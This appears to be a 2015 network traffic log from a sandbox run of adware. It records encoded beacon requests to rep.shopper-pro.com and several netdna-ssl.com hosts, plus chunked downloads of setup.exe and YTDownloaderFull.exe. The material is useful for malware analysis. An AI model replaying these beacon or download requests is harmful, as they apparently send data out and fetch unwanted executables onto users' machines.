X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
abfgshdgfjhsk....



GET /t.ashx?e=QgW8pN5r26byj2QAAnEFBM30ehTmVX1mQBD1m2L769FXGmhmyGgv7qkO9/DuORuprIIa1xct7ImOrIk6OakHpXG9WQc5JBBFWLazpewXw1jXt7qcDfFhJwTxIUcsgQ wzdQpwoYb2d0uTGF2cL9EmtvhlH7qLNe2qcNRkPd4KMvKLtIqZz8gHG6KihZpGgAn HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: yk9s88xsxo-zxis6jz8.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:26 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 13
Connection: keep-alive
Cache-Control: private,no-cache, no-store
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
abfgshdgfjhsk..


GET /utility.gif?error=start&report=mini_s&ver=803&action=na&ms_vr=3&clock=0&rnd=18514 HTTP/1.1
Host: errors.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Thu, 13 Aug 2015 11:19:21 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
GIF89a.............!.......,...........L..;..


GET /app/ping.ashx?e=j7YMo/n29XPJd3Cl8WpRrt5jOExRmJjcO2zR9ArYI84icvsFwQStENB87jgWTbK/3s5q cLFxyxYWD4MTU1ewbPSKLqmmOmOblFuMGpJvGKIJGNp/ 1I9GCArG4HtKvdX1gPBPGd4Gf2NRySioDRRk/1J3P8veFvLH4IoLPLWWwmPRXV7cLSOcTQfYT78rW6o JhFVUwrL/KKMB ON7 S1TM8xmV4vn5JDr9I5ZW0pTpBU9U/r/dsNyvhlGeipNVQ6A hJB6uhJAw85hRFS7YMmYLvqrm5 34uZ/p4emFS3nW9YwSk5gj28Va7JmIs/Bl13yhrpfYAMeIGfrzyWRyvy2gKbXyPPDXUoXAX2Uiz3W6sPFKrniC4jaKTJ4Po/  HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: rep.shopper-pro.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: private
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Thu, 13 Aug 2015 11:19:33 GMT
Content-Length: 0
....



GET /app/ping.ashx?e=Ka qOJkckoXHjWHokC5IQKgWR 5S3q5q62ls PLHCLDT03ZwnpMmrnnHkVEbFY2mhwr4VlWkO0yul9pd4H5jC6/NyPZdyyiin/GGy8byFgpgKkdlz1lRoYK03JXbbVmAY0ZRB54QLU9s0DpOFQBDKtJMHu88K1rwaE3O18WF9F0d212AYeRmsjiTgabm 9KyTurUOoOhKHAWZuVwyMddF6Z1N9JE36WiiCgXFJE54ba3yZbyqF02 D1Q ijBQ9I1GFvOpVsOwzzvGXsyNILdq6t9GbH/wnaf3AtLPqBYAg4fnTdJhi/F jqL/OPRls1am988pbBE198Bbak1i16fYytqnU4k0fribeIhZIOGE9621TzruYcSjl gAUOMZfgulwJkQAVG5kmEQOVvkS6cCKC4/FjewiPFDMWtlnh6ykf3xLsYR5HcB6c2C4KGeMVjZ4jzc3YjAmYShy1QgM mULHn4xNjI6qV1hbcceYGEhwEchBIBSL pnq6LeO//ew/cRstaZMh7oc9Jm6LOUplLi9UaJ0lDNBvBxfXneO6iyXLvPTXiM8YeL1JXfzjhvHW HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: rep.shopper-pro.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: private
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Thu, 13 Aug 2015 11:19:33 GMT
Content-Length: 0
....



GET /app/ping.ashx?e=WL9usJOVMsPXmto/P2xI1pGfa3o7qc5t56XqnYmheUgSZTerw9Y85dVUaX7QH4byIYSfA6BN7OBJ4GPHeEFvMkF5ezSia8QQf4SJJgI1sB24ZvM W8i8tdtgpjL3X7N9nl1xOKDZuhXrGiiXWYz3NvgrB1VZh8CMsYns0spGP2dTvMZjEVVmTm 4 SQMoieQ8Lxp8HLogowR591rTzu05PNsA1iuxLaBHdtdgGHkZrI4k4Gm5vvSsk7q1DqDoShwFmblcMjHXRdicB7EPPnRdH5TN3b4ooc0d6j7/wRBDsRoqvWX6JwkejqMehRdfaX6iZYn8TH3Pe3MlW9RFqOniqVRDsrPlqwdmkLLb35jLfrVLutmednZNQ== HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: rep.shopper-pro.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: private
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Thu, 13 Aug 2015 11:19:34 GMT
Content-Length: 0
....



GET /app/ping.ashx?e=WL9usJOVMsOEyHZoFFyrCAXu1dujY6mNj6To0cJP4sHZhN5o5pkk8XKxIhAz9YyqGyBmbznVabvTlwRzR0XAuFPFaHNc6V5gJkKnreMZm2O/To1HJcqC2VX2gru9mb3lVEZbv3odR7drnS7dfKKClSmRgGcjsyyBKl4uaJsEWT1rk4Satsm2USSWkiD 8aIWFAbDvDttaaPPt30posPzj93QiescafgJJI2sziJUfUjYt3Zg/aKemGVSvOHNjNGnWk7S5mNvBaWXs3H/bXdU0ToldukDzx1llVhPQP8X9sNG9pOkZ/PfGFwkoLVF6jef2zYWz6DzTPSToKv2VpIXZetFtmcGfLS6G/eITPVk2cBiFIt/eCwnOFhZWN4UpKuAnAhg 6mBvfU= HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: rep.shopper-pro.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: private
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Thu, 13 Aug 2015 11:19:35 GMT
Content-Length: 0


GET /web/gf/all/setup.exe HTTP/1.1
Range: bytes=0-249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 13 Aug 2015 11:18:24 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1439433409"
Last-Modified: Thu, 13 Aug 2015 02:36:49 GMT
Cache-Control: max-age=1220
Content-Length: 216576
Content-Range: bytes 0-216575/216576
Content-Type: application/x-msdownload
X-HW: 1439464705.dop001.am4.t,1439464704.cds055.am4.c
Content-Disposition: attachment; filename="setup.exe"

<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1
Range: bytes=250000-499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: g2rg9r-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 13 Aug 2015 11:18:32 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: eFEBNqiEnEkoDloZp91Zx2si6RR/oMsvagG/xVcDBhZaORl9ljUADGITd4JChzGN
x-amz-request-id: D53469627CD165E3
Last-Modified: Wed, 12 Aug 2015 09:59:55 GMT
ETag: "80983119d269b38036bfa667b53c15c7"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 250000-499999/7202623

<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1
Range: bytes=750000-999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: g2rg9r-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 13 Aug 2015 11:18:32 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: eFEBNqiEnEkoDloZp91Zx2si6RR/oMsvagG/xVcDBhZaORl9ljUADGITd4JChzGN
x-amz-request-id: D53469627CD165E3
Last-Modified: Wed, 12 Aug 2015 09:59:55 GMT
ETag: "80983119d269b38036bfa667b53c15c7"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 750000-999999/7202623

<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1
Range: bytes=1250000-1499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: g2rg9r-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 13 Aug 2015 11:18:32 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: eFEBNqiEnEkoDloZp91Zx2si6RR/oMsvagG/xVcDBhZaORl9ljUADGITd4JChzGN
x-amz-request-id: D53469627CD165E3
Last-Modified: Wed, 12 Aug 2015 09:59:55 GMT
ETag: "80983119d269b38036bfa667b53c15c7"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 1250000-1499999/7202623

<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1
Range: bytes=1750000-1999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: g2rg9r-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 13 Aug 2015 11:18:32 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: eFEBNqiEnEkoDloZp91Zx2si6RR/oMsvagG/xVcDBhZaORl9ljUADGITd4JChzGN
x-amz-request-id: D53469627CD165E3
Last-Modified: Wed, 12 Aug 2015 09:59:55 GMT
ETag: "80983119d269b38036bfa667b53c15c7"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 1750000-1999999/7202623

<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=2750000-2999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: g2rg9r-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 13 Aug 2015 11:18:33 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: eFEBNqiEnEkoDloZp91Zx2si6RR/oMsvagG/xVcDBhZaORl9ljUADGITd4JChzGN
x-amz-request-id: D53469627CD165E3
Last-Modified: Wed, 12 Aug 2015 09:59:55 GMT
ETag: "80983119d269b38036bfa667b53c15c7"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 2750000-2999999/7202623

<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=3250000-3499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: g2rg9r-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 13 Aug 2015 11:18:33 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: eFEBNqiEnEkoDloZp91Zx2si6RR/oMsvagG/xVcDBhZaORl9ljUADGITd4JChzGN
x-amz-request-id: D53469627CD165E3
Last-Modified: Wed, 12 Aug 2015 09:59:55 GMT
ETag: "80983119d269b38036bfa667b53c15c7"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 3250000-3499999/7202623

<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=3750000-3999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: g2rg9r-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 13 Aug 2015 11:18:33 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: eFEBNqiEnEkoDloZp91Zx2si6RR/oMsvagG/xVcDBhZaORl9ljUADGITd4JChzGN
x-amz-request-id: D53469627CD165E3
Last-Modified: Wed, 12 Aug 2015 09:59:55 GMT
ETag: "80983119d269b38036bfa667b53c15c7"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 3750000-3999999/7202623

<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=4250000-4499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: g2rg9r-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 13 Aug 2015 11:18:33 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: eFEBNqiEnEkoDloZp91Zx2si6RR/oMsvagG/xVcDBhZaORl9ljUADGITd4JChzGN
x-amz-request-id: D53469627CD165E3
Last-Modified: Wed, 12 Aug 2015 09:59:55 GMT
ETag: "80983119d269b38036bfa667b53c15c7"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 4250000-4499999/7202623

<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=4750000-4999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: g2rg9r-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 13 Aug 2015 11:18:33 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: eFEBNqiEnEkoDloZp91Zx2si6RR/oMsvagG/xVcDBhZaORl9ljUADGITd4JChzGN
x-amz-request-id: D53469627CD165E3
Last-Modified: Wed, 12 Aug 2015 09:59:55 GMT
ETag: "80983119d269b38036bfa667b53c15c7"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 4750000-4999999/7202623

<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=5250000-5499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: g2rg9r-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 13 Aug 2015 11:18:34 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: eFEBNqiEnEkoDloZp91Zx2si6RR/oMsvagG/xVcDBhZaORl9ljUADGITd4JChzGN
x-amz-request-id: D53469627CD165E3
Last-Modified: Wed, 12 Aug 2015 09:59:55 GMT
ETag: "80983119d269b38036bfa667b53c15c7"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 5250000-5499999/7202623

<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=5750000-5999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: g2rg9r-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 13 Aug 2015 11:18:34 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: eFEBNqiEnEkoDloZp91Zx2si6RR/oMsvagG/xVcDBhZaORl9ljUADGITd4JChzGN
x-amz-request-id: D53469627CD165E3
Last-Modified: Wed, 12 Aug 2015 09:59:55 GMT
ETag: "80983119d269b38036bfa667b53c15c7"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 5750000-5999999/7202623

<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=6250000-6499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: g2rg9r-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 13 Aug 2015 11:18:34 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: eFEBNqiEnEkoDloZp91Zx2si6RR/oMsvagG/xVcDBhZaORl9ljUADGITd4JChzGN
x-amz-request-id: D53469627CD165E3
Last-Modified: Wed, 12 Aug 2015 09:59:55 GMT
ETag: "80983119d269b38036bfa667b53c15c7"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 6250000-6499999/7202623

<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=6750000-6999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: g2rg9r-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 13 Aug 2015 11:18:34 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: eFEBNqiEnEkoDloZp91Zx2si6RR/oMsvagG/xVcDBhZaORl9ljUADGITd4JChzGN
x-amz-request-id: D53469627CD165E3
Last-Modified: Wed, 12 Aug 2015 09:59:55 GMT
ETag: "80983119d269b38036bfa667b53c15c7"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 6750000-6999999/7202623

<<< skipped >>>

GET /9313.ashx?e=KSz5qzb2KgILjT49fHfOTEy1U5i0Jcc8jvdcLv9L0ULeyzV7AofXlljJzRxQxlEZcdkrDIlyRZ3  QFrihM290CN9h bV19VdXQO8eCkzNk9LWPkwGrB/imF904v4t2DTTuHrYVulo109x0h yMmOp6IOl1JW3sHB9kWS7dXZ6elIsRF9MX88CO265/Kjb 488/XPfhk4uBUiNRLLAgct5oMOyZur3pkEghD3HnQv1a/gCZD66/sdSVKFBzVQWjB05oujAfFWpTOgMsHybNe40DPXjVNm at3mAerssgcNWUIia6WITopWDcT qioK0TvO7tQdS7Pb5LlxRWf0cqGrN/G5zN QDpcSQHkYgFaOBv7DByqGp2noDEWmBK24T6wUFUm6AwzmaIYfI6O6ruLd0T1shsZ 3kYZJCvGTB0II76PaOLcDiT6i7uu4ZLp9tYOQ0C4B6wOMHFWmaAPLjzUoonoBGYhxQckdTtpt CJE/NAFMRO0hJ42ac9bD3MadSN58qZygCScEpVXMQzDInewhsAaqZyLDLLNMXZjRZW4= HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:33 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /9313.ashx?e=wlkQ3WKgYpSXQ02 mivEAEQ1GWwIMthwtyLw6hNuJQGAMRxV Cn6lnsc7hbJtTJHDHGXB7YFOPH7H OCiIJdXc LjjRvaSA4fJsKHIM1ro1Fhap1svS6Dz9hP8ILQ7STKYX3Ti/i3YOeiDpdSVt7BwfZFku3V2enpSLERfTF/PAjtuufyo2/uPPP1z34ZOLgVIjUSywIHLeaDDsmbq96ZMtJ XAicqhKxNB9hPvytbqj4mEVVTCsv8oowH443v5LVMzzGZXi fl6ZL2NeMWCfA== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:36 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS


GET /11153.ashx?e=NVqRyNkruooT/daslwwbUvMtz3dZh2P6aMzgTHP7UuxxTYwWxYG9WM2wWArmgLQLxpJZRDiatLKZwV0mx4LJvkCN9h bV19VdXQO8eCkzNk9LWPkwGrB/imF904v4t2DTTuHrYVulo109x0h yMmOp6IOl1JW3sHB9kWS7dXZ6elIsRF9MX88CO265/Kjb 488/XPfhk4uBUiNRLLAgct8wjjUrZ/qJkmB0RNQ 9BzBNqeRPeOqgjazACGY CgK6eqXaZH4mK3kqgSNqV7u8iR3AQSpIJXB7L4uKB8G6McV84RHzLnn1bXMAwyoiKXvjmRmxRGf9zFEKY/VNO/cxtzOS6jq UbgqBz1jcZZbz05IQbYQvC6sk0cdVK5OLpFHVdPwqUuqOwA003r2uKrGnlnotumY2YUYLnl7FCVUbw972nxHK4nudtK7r9jGEfZIEoRN 6ZHvZxCVNbsRxhip/uvaFUgbktt1b8Epic0SPi6TzbxlgO9RcTQfYT78rW6o JhFVUwrL/KKMB ON7 S1TM8xmV4vn5emS9jXjFgnw= HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:33 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /11153.ashx?e=4mC0vXGWFtoJz2TpdH2qbEQ1GWwIMthw7wq1eibGVAGAMRxV Cn6lnsc7hbJtTJHDHGXB7YFOPH7H OCiIJdXWPgIqkg/KntpjkZwwc6dH53FRTfUsruhOl6T0Yw8cmQjgb6v7cXpPu93RkgrfPIdK/1bjUefs49JU1ySiay1sqdymVuPyjsZ40oQa07NiSGd51jxu8kbC0X1dGgWnCEBcBeHgs9Q765QI4IYW7BlwKG/8 ILd4bihRW JECizii0o6CnERxfiaF8KpepynoFA== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:37 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS


GET /27136.ashx?e=043Mckb8Lnhw7iCtSAyu/0Q1GWwIMthwdQXWEODVVZKAMRxV Cn6lnsc7hbJtTJHDHGXB7YFOPH7H OCiIJdXed4zY8kJssz4u3oGHN86wPQVtpqSKGA7U/Xst3NHAatCNiNeNKIpAJfoAFDjGX4LpcCZEAFRuZJhEDlb5EunAiguPxY3sIjxZjnXlvApvj8 HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:25 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /27136.ashx?e=bNFVvuIwcz4F7tXbo2OpjbeGOAxO2gKXKB2ZKuKuT4UgLxC0aXqYrUEev CIr75kJRiOVUDkXyMY3q3Uh zLol JfVwpv1Wv16XIqLxILHtgx1Ht egA6a3os1yMNpRF7gBtB5 kYUpdpaCi3i8nACSWkiD 8aIWFAbDvDttaaPPt30posPzj93QiescafgJpHZ15mOZ7RI= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:25 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /27136.ashx?e=LCnUzM5l8JKBkxMrsxJdJt5jOExRmJjc8lXlmdaIM2I2fVsQFDtppKaDl0KcD5tVUA7dl9owwhIeI9VTThLJ3RT4XQvpdvP/vmvWGv/OqVKUNzDX0G1Ln0DOGtgSBCtpWMnNHFDGURlx2SsMiXJFnYjCD6AQoJRo74r1XQZFERKa2dF0VKZsa0uea6nUoHK BPEhRyyBD7DN1CnChhvZ3S5MYXZwv0Sa2 GUfuos17apw1GQ93goy8ou0ipnPyAcC4K0pGUhWjZ3f64oXp7sfQ8Kj6Mu8v3vRYAGA yJTjm4X1w8Zq00iu0G5YLl Sb68Tidbbz5Drk= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:25 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /27136.ashx?e=aQQpsP6/AW3asU58GPZMZUQ1GWwIMthwOB8LVXt4qhaAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyTurUOoOhKHAWZuVwyMddF4DvgIgyQhW4FOOgkw2kW7zvB/zEWicRw8Nh KJlr0oRpMGDKQa0FePN2I0qd4G3ExvDbcr2ZCWDFAL52sIXt4UoKtXISWiV4lHG3D5R3V5O0a/7yn1m/tGd3P3SqySAb8TQfYT78rW6o JhFVUwrL/KKMB ON7 S1TM8xmV4vn5a7srxy/100X021585MfhSh3bXYBh5GayOJOBpub70rJO6tQ6g6EocBZm5XDIx10XwGDIKLmaUks= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:25 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /27136.ashx?e=aQQpsP6/AW3asU58GPZMZUQ1GWwIMthwOB8LVXt4qhaAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyTurUOoOhKHAWZuVwyMddF4DvgIgyQhW4FOOgkw2kW7zvB/zEWicRw8Nh KJlr0oRpMGDKQa0FeMbGtOpbXm9kJjesXPvEdr8s IILilpWF0xztg6 4zwmphq5YRs3Ua3kOLZWZ3INLADa67vNBCQrY2ac9bD3MadSN58qZygCScEpVXMQzDInewhsAaqZyLDqaP5RI6XgJQcxXLgDRmHLOkFT1T v92w3K GUZ6Kk1VDoD6EkHq6EkDDzmFEVLtgFCP02w6EunE= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:26 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /27136.ashx?e=aQQpsP6/AW3asU58GPZMZUQ1GWwIMthwOB8LVXt4qhaAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyTurUOoOhKHAWZuVwyMddF4DvgIgyQhW4FOOgkw2kW7zvB/zEWicRw8Nh KJlr0oRpMGDKQa0FeOfXhYbE9Wm3iuFUsM2slALjgb6v7cXpPvvDUPlfCzRdlPqkO/QXEWVboHDCUOFdfNUw yx3IACsY0 /eJ8LmRXU7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOQ TnksFA3b2toTYm7KkeYVZVK84c2M0adaTtLmY28FpZezcf9td1TROiV26QPPHWU1VVI0/LSiBw== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:26 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /27136.ashx?e=aQQpsP6/AW3asU58GPZMZUQ1GWwIMthwOB8LVXt4qhaAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyTurUOoOhKHAWZuVwyMddF4DvgIgyQhW4FOOgkw2kW7zvB/zEWicRw8Nh KJlr0oRpMGDKQa0FeOTRcHKuVeTpSxfMJgkYeRrKYX3Ti/i3YNxO48S9k5zx42nGtSBySjjX6ABQ4xl C6XAmRABUbmSYRA5W RLpwIoLj8WN7CI8VJWpTUhdoetbAQhJgQ701LudQlG124a8hFOTAwlw8YF3uTBXM1Y6t 6KtOGc7JYKogsm34mrKW2Q== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:26 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



